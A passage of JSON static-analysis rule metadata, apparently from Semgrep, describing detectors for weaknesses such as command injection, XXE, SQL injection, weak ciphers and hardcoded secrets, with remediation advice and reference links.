[https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection)\n - [https://www.securecodewarrior.com/blog/coders-conquer-security-share-learn-series-os-command-injection](https://www.securecodewarrior.com/blog/coders-conquer-security-share-learn-series-os-command-injection)\n - [https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fdata_handling~2Finjection~2Foscmd](https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fdata_handling~2Finjection~2Foscmd)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent command injection, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. For more information, see [JavaScript command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request","id":"java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request","name":"java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of the insecure RC4 stream cipher encryption algorithm was identified. RC4 is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly."},"help":{"markdown":"The use of the insecure RC4 stream cipher encryption algorithm was identified. RC4 is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"The use of the insecure RC4 stream cipher encryption algorithm was identified. RC4 is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4","id":"swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4","name":"swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. The xml parsing libraries are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, they are still vulnerable to denial of service attacks such as billion laughs and quadratic blowup. To mitigate these attacks, it is recommended to use a different parser such as defusedxml."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. The xml parsing libraries are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, they are still vulnerable to denial of service attacks such as billion laughs and quadratic blowup. To mitigate these attacks, it is recommended to use a different parser such as defusedxml.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.python.org/3/library/xml.html#xml-vulnerabilities](https://docs.python.org/3/library/xml.html#xml-vulnerabilities)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing)\n - [https://pypi.org/project/defusedxml/](https://pypi.org/project/defusedxml/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. The xml parsing libraries are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, they are still vulnerable to denial of service attacks such as billion laughs and quadratic blowup. To mitigate these attacks, it is recommended to use a different parser such as defusedxml."},"helpUri":"https://semgrep.dev/r/python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib","id":"python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib","name":"python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Oracle update is not restricted in $F()"},"help":{"markdown":"Oracle update is not restricted in $F()\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control)\n - [https://medium.com/immunefi/sense-finance-access-control-issue-bugfix-review-32e0c806b1a0](https://medium.com/immunefi/sense-finance-access-control-issue-bugfix-review-32e0c806b1a0)\n","text":"Oracle update is not restricted in $F()"},"helpUri":"https://semgrep.dev/r/solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control","id":"solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control","name":"solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Marking code as privileged enables a piece of trusted code to temporarily enable access to more resources than are available directly to the code that called it. Be very careful in your use of the privileged construct, and always remember to make the privileged code section as small as possible."},"help":{"markdown":"Marking code as privileged enables a piece of trusted code to temporarily enable access to more resources than are available directly to the code that called it. Be very careful in your use of the privileged construct, and always remember to make the privileged code section as small as possible.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.do-privileged-use.do-privileged-use)\n - [https://docs.oracle.com/javase/8/docs/technotes/guides/security/doprivileged.html](https://docs.oracle.com/javase/8/docs/technotes/guides/security/doprivileged.html)\n - [https://wiki.sei.cmu.edu/confluence/display/java/Privilege+Escalation](https://wiki.sei.cmu.edu/confluence/display/java/Privilege+Escalation)\n - [http://phrack.org/papers/escaping_the_java_sandbox.html](http://phrack.org/papers/escaping_the_java_sandbox.html)\n","text":"Marking code as privileged enables a piece of trusted code to temporarily enable access to more resources than are available directly to the code that called it. Be very careful in your use of the privileged construct, and always remember to make the privileged code section as small as possible."},"helpUri":"https://semgrep.dev/r/java.lang.security.do-privileged-use.do-privileged-use","id":"java.lang.security.do-privileged-use.do-privileged-use","name":"java.lang.security.do-privileged-use.do-privileged-use","properties":{"precision":"very-high","tags":["CWE-269: Improper Privilege Management","LOW CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.do-privileged-use.do-privileged-use"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as SQLAlchemy which will protect your queries."},"help":{"markdown":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as SQLAlchemy which will protect your queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.injection.tainted-sql-string.tainted-sql-string)\n - [https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-textual-sql](https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-textual-sql)\n - [https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm](https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm)\n - [https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-more-specific-text-with-table-expression-literal-column-and-expression-column](https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-more-specific-text-with-table-expression-literal-column-and-expression-column)\n","text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as SQLAlchemy which will protect your queries."},"helpUri":"https://semgrep.dev/r/python.flask.security.injection.tainted-sql-string.tainted-sql-string","id":"python.flask.security.injection.tainted-sql-string.tainted-sql-string","name":"python.flask.security.injection.tainted-sql-string.tainted-sql-string","properties":{"precision":"very-high","tags":["CWE-704: Incorrect Type Conversion or Cast","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.injection.tainted-sql-string.tainted-sql-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password","id":"python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password","name":"python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a `mssql` JS SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `$REQ.input('USER_ID', mssql.Int, id);`"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a `mssql` JS SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `$REQ.input('USER_ID', mssql.Int, id);`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli)\n - [https://www.npmjs.com/package/mssql](https://www.npmjs.com/package/mssql)\n","text":"Detected string concatenation with a non-literal variable in a `mssql` JS SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `$REQ.input('USER_ID', mssql.Int, id);`"},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli","id":"javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli","name":"javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"It looks like you're using an implementation of XSSRequestWrapper from dzone. (https://www.javacodegeeks.com/2012/07/anti-cross-site-scripting-xss-filter.html) The XSS filtering in this code is not secure and can be bypassed by malicious actors. It is recommended to use a stack that automatically escapes in your view or templates instead of filtering yourself."},"help":{"markdown":"It looks like you're using an implementation of XSSRequestWrapper from dzone. (https://www.javacodegeeks.com/2012/07/anti-cross-site-scripting-xss-filter.html) The XSS filtering in this code is not secure and can be bypassed by malicious actors. It is recommended to use a stack that automatically escapes in your view or templates instead of filtering yourself.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"It looks like you're using an implementation of XSSRequestWrapper from dzone. (https://www.javacodegeeks.com/2012/07/anti-cross-site-scripting-xss-filter.html) The XSS filtering in this code is not secure and can be bypassed by malicious actors. It is recommended to use a stack that automatically escapes in your view or templates instead of filtering yourself."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure","id":"java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure","name":"java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Certificate verification has been explicitly disabled. This permits insecure connections to insecure servers. Re-enable certification validation."},"help":{"markdown":"Certificate verification has been explicitly disabled. This permits insecure connections to insecure servers. Re-enable certification validation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.requests.security.disabled-cert-validation.disabled-cert-validation)\n - [https://stackoverflow.com/questions/41740361/is-it-safe-to-disable-ssl-certificate-verification-in-pythonss-requests-lib](https://stackoverflow.com/questions/41740361/is-it-safe-to-disable-ssl-certificate-verification-in-pythonss-requests-lib)\n","text":"Certificate verification has been explicitly disabled. This permits insecure connections to insecure servers. Re-enable certification validation."},"helpUri":"https://semgrep.dev/r/python.requests.security.disabled-cert-validation.disabled-cert-validation","id":"python.requests.security.disabled-cert-validation.disabled-cert-validation","name":"python.requests.security.disabled-cert-validation.disabled-cert-validation","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.requests.security.disabled-cert-validation.disabled-cert-validation"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"When data from an untrusted source is put into a logger and not neutralized correctly, an attacker could forge log entries or include malicious content."},"help":{"markdown":"When data from an untrusted source is put into a logger and not neutralized correctly, an attacker could forge log entries or include malicious content.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crlf-injection-logs.crlf-injection-logs)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"When data from an untrusted source is put into a logger and not neutralized correctly, an attacker could forge log entries or include malicious content."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crlf-injection-logs.crlf-injection-logs","id":"java.lang.security.audit.crlf-injection-logs.crlf-injection-logs","name":"java.lang.security.audit.crlf-injection-logs.crlf-injection-logs","properties":{"precision":"very-high","tags":["CWE-93: Improper Neutralization of CRLF Sequences ('CRLF Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crlf-injection-logs.crlf-injection-logs"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret","id":"java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret","name":"java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected hardcoded password used in basic authentication in a controller class. Including this password in version control could expose this credential. Consider refactoring to use environment variables or configuration files."},"help":{"markdown":"Detected hardcoded password used in basic authentication in a controller class. Including this password in version control could expose this credential. Consider refactoring to use environment variables or configuration files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"Detected hardcoded password used in basic authentication in a controller class. Including this password in version control could expose this credential. Consider refactoring to use environment variables or configuration files."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller","id":"ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller","name":"ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A cookie was detected without setting the 'secure' flag. The 'secure' flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the 'secure' flag by calling '$COOKIE.setSecure(true);'"},"help":{"markdown":"A cookie was detected without setting the 'secure' flag. The 'secure' flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the 'secure' flag by calling '$COOKIE.setSecure(true);'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag)\n - [https://owasp.org/www-community/controls/SecureCookieAttribute](https://owasp.org/www-community/controls/SecureCookieAttribute)\n","text":"A cookie was detected without setting the 'secure' flag. The 'secure' flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the 'secure' flag by calling '$COOKIE.setSecure(true);'"},"helpUri":"https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag","id":"java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag","name":"java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In PHP, this can lead to both local file inclusion (LFI) or remote file inclusion (RFI) if user input reaches this statement. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In PHP, this can lead to both local file inclusion (LFI) or remote file inclusion (RFI) if user input reaches this statement. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-path-traversal.laravel-path-traversal)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#path-traversal](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#path-traversal)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In PHP, this can lead to both local file inclusion (LFI) or remote file inclusion (RFI) if user input reaches this statement. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-path-traversal.laravel-path-traversal","id":"php.laravel.security.laravel-path-traversal.laravel-path-traversal","name":"php.laravel.security.laravel-path-traversal.laravel-path-traversal","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-path-traversal.laravel-path-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password","id":"python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password","name":"python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://www.stackhawk.com/blog/command-injection-python/](https://www.stackhawk.com/blog/command-injection-python/)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi","id":"python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi","name":"python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked 